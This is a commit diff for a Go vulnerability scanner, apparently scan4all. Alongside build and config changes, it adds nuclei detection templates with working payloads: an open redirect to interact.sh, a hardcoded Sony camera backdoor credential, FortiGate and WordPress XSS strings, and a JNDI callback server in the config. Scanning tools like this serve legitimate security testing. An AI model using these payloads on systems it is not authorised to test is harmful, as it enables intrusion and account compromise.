1、Up PoCs

2、Refactor the engine model
3、add async do cmd
4、Optimize masscan code 2022-09-24

.github/build/linux.yml

@@ -16,16 +16,16 @@ builds:
       - linux
     goarch:
       - amd64
-      - mips
-      - mips64
-      - mips64le
-      - mipsle
-      - ppc64
-      - ppc64le
-      - riscv64
-      - s390x
-      - arm
-      - arm64
+#      - mips
+#      - mips64
+#      - mips64le
+#      - mipsle
+#      - ppc64
+#      - ppc64le
+#      - riscv64
+#      - s390x
+#      - arm
+#      - arm64
 archives:
 - format: zip
 

.github/workflows/build.yml

@@ -39,7 +39,7 @@ jobs:
         with:
           go-version: 1.18
       - name: Install Dependences
-        run: sudo apt install -yy libpcap-dev upx
+        run: sudo apt install -yy libpcap-dev upx gcc-aarch64-linux-gnu g++-aarch64-linux-gnu
 
       - name: Run GoReleaser
         uses: goreleaser/goreleaser-action@v2

brute/fuzzAI.go

@@ -55,7 +55,7 @@ func init() {
 				asz404Url = aT1 // 容错
 			}
 		}
-		util.GetDb(&ErrPage{})
+		util.InitDb(&ErrPage{})
 	})
 }
 

config/config.json

@@ -1,4 +1,7 @@
 {
+  "ScanPoolSize":5000,
+  "JndiAddress": "https://rcejndi.51pwn.com",
+  "CeyeDomain": "scan4all.51pwn.com",
   "CacheName": ".DbCache",
   "autoRmCache": "true",
   "ssh_username": "pkg/hydra/dicts/ssh_user.txt",

config/nuclei-templates/cves/2016/CVE-2016-10368.yaml

@@ -0,0 +1,38 @@
+id: CVE-2016-10368
+
+info:
+  name: Opsview Monitor Pro 4.5.x - Open Redirect
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    Open redirect vulnerability in Opsview Monitor Pro (Prior to 5.1.0.162300841 prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
+  reference:
+    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18774
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10368
+    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-016/?fid=8341
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2016-10368
+    cwe-id: CWE-601
+  tags: cve,cve2016,redirect,opsview,authenticated
+
+requests:
+  - raw:
+      - |
+        POST /login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        login_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
+
+      - type: status
+        status:
+          - 302

config/nuclei-templates/cves/2016/CVE-2016-7834.yaml

@@ -0,0 +1,44 @@
+id: CVE-2016-7834
+
+info:
+  name: Sony IPELA Engine IP Camera - Harcoded Account
+  author: af001
+  severity: high
+  description: |
+    Multiple SONY network cameras are vulnerable to sensitive information disclosure via hardcoded credentials.
+  reference:
+    - https://sec-consult.com/vulnerability-lab/advisory/backdoor-vulnerability-in-sony-ipela-engine-ip-cameras/
+    - https://www.bleepingcomputer.com/news/security/backdoor-found-in-80-sony-surveillance-camera-models/
+    - https://jvn.jp/en/vu/JVNVU96435227/index.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-7834
+  remediation: |
+    Upgrade to the latest version of the firmware provided by Sony.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2016-7834
+    cwe-id: CWE-200
+  tags: sony,backdoor,unauth,telnet,iot,camera
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/command/prima-factory.cgi"
+
+    headers:
+      Authorization: Bearer cHJpbWFuYTpwcmltYW5h
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'gen5th'
+          - 'gen6th'
+        condition: or
+
+      - type: status
+        status:
+          - 204
+
+# Enhanced by cs 09/23/2022

config/nuclei-templates/cves/2017/CVE-2017-14186.yml

@@ -0,0 +1,38 @@
+id: CVE-2017-14186
+
+info:
+  name: FortiGate SSL VPN Web Portal - Cross Site Scripting
+  author: johnk3r
+  severity: medium
+  description: |
+    Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-17-242
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-14186
+  classification:
+    cve-id: CVE-2017-14186
+  metadata:
+    verified: true
+    shodan-query: port:10443 http.favicon.hash:945408572
+  tags: cve,cve2017,fortigate,xss,fortinet
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'location=decodeURIComponent("javascript%3Aalert%28document.domain%29"'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2018/CVE-2018-1000671.yaml

@@ -7,7 +7,6 @@ info:
   description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
   reference:
     - https://github.com/sympa-community/sympa/issues/268
-    - https://www.cvedetails.com/cve/CVE-2018-1000671
     - https://vuldb.com/?id.123670
     - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671
   classification:

config/nuclei-templates/cves/2018/CVE-2018-10956.yaml

@@ -9,7 +9,6 @@ info:
   reference:
     - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
     - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
-    - https://www.cvedetails.com/cve/CVE-2018-10956
     - https://www.exploit-db.com/exploits/44916/
     - https://nvd.nist.gov/vuln/detail/CVE-2018-10956
   classification:

config/nuclei-templates/cves/2018/CVE-2018-12300.yaml

@@ -7,7 +7,7 @@ info:
   description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter.
   reference:
     - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170
-    - https://www.cvedetails.com/cve/CVE-2018-12300
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-12300
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

config/nuclei-templates/cves/2018/CVE-2018-14931.yaml

@@ -7,7 +7,7 @@ info:
   description: Polarisft Intellect Core Banking Software Version 9.7.1 is susceptible to an open redirect issue in the Core and Portal modules via the /IntellectMain.jsp?IntellectSystem= URI.
   reference:
     - https://neetech18.blogspot.com/2019/03/polaris-intellect-core-banking-software_31.html
-    - https://www.cvedetails.com/cve/CVE-2018-14931
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-14931
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

config/nuclei-templates/cves/2018/CVE-2018-16133.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html
     - http://www.cybrotech.com/
-    - https://www.cvedetails.com/cve/CVE-2018-16133
     - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
     - https://nvd.nist.gov/vuln/detail/CVE-2018-16133
   classification:

config/nuclei-templates/cves/2018/CVE-2018-16761.yaml

@@ -8,9 +8,8 @@ info:
     Eventum before 3.4.0 has an open redirect vulnerability.
   reference:
     - https://www.invicti.com/web-applications-advisories/ns-18-021-open-redirection-vulnerabilities-in-eventum/
-    - https://github.com/eventum/eventum/
-    - https://www.cvedetails.com/cve/CVE-2018-16761/
     - https://github.com/eventum/eventum/releases/tag/v3.4.0
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-16761
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1

config/nuclei-templates/cves/2018/CVE-2018-18323.yaml

@@ -9,7 +9,6 @@ info:
   reference:
     - https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
     - http://centos-webpanel.com/
-    - https://www.cvedetails.com/cve/CVE-2018-18323
     - https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
     - https://nvd.nist.gov/vuln/detail/CVE-2018-18323
   classification:

config/nuclei-templates/cves/2018/CVE-2018-19386.yaml

@@ -6,7 +6,6 @@ info:
   severity: medium
   description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
   reference:
-    - https://www.cvedetails.com/cve/CVE-2018-19386/
     - https://i.imgur.com/Y7t2AD6.png
     - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
     - https://nvd.nist.gov/vuln/detail/CVE-2018-19386

config/nuclei-templates/cves/2018/CVE-2018-19458.yaml

@@ -8,9 +8,9 @@ info:
     PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
   reference:
     - https://www.exploit-db.com/exploits/45780
-    - https://www.cvedetails.com/cve/CVE-2018-19458
     - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-19458
+    - https://www.exploit-db.com/exploits/45780/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5

config/nuclei-templates/cves/2018/CVE-2018-20985.yaml

@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/
     - https://wordpress.org/plugins/wp-payeezy-pay/#developers
-    - https://www.cvedetails.com/cve/CVE-2018-20985/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-20985
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8

config/nuclei-templates/cves/2018/CVE-2018-6008.yaml

@@ -7,7 +7,6 @@ info:
   description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter.
   reference:
     - https://www.exploit-db.com/exploits/43913
-    - https://www.cvedetails.com/cve/CVE-2018-6008
     - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html
     - https://nvd.nist.gov/vuln/detail/CVE-2018-6008
   classification:

config/nuclei-templates/cves/2018/CVE-2018-8719.yaml

@@ -8,8 +8,8 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/44371
     - https://vuldb.com/?id.115817
-    - https://www.cvedetails.com/cve/CVE-2018-8719/
     - https://www.exploit-db.com/exploits/44371/
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8719
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3

config/nuclei-templates/cves/2021/CVE-2021-25104.yaml

@@ -0,0 +1,55 @@
+id: CVE-2021-25104
+
+info:
+  name: Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting
+  author: Akincibor
+  severity: medium
+  description: The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue.
+  reference:
+    - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
+    - https://wordpress.org/plugins/ocean-extra/
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25104
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-25104
+  remediation: Fixed in version 1.9.5
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2021-25104
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script>   HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'OceanWP'
+          - '><script>alert(/XSS/)</script>'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200